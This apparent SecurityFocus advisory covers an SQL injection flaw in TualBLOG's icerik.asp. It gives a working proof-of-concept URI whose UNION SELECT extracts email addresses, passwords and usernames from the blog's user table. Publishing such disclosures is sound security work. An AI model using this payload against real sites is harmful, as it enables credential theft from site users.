TualBLOG Icerik.ASP SQL Injection Vulnerability

Attackers can exploit this issue via a web client.

The following proof-of-concept URI is available:

http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1

Dj ReMix


 

Privacy Statement
Copyright 2010, SecurityFocus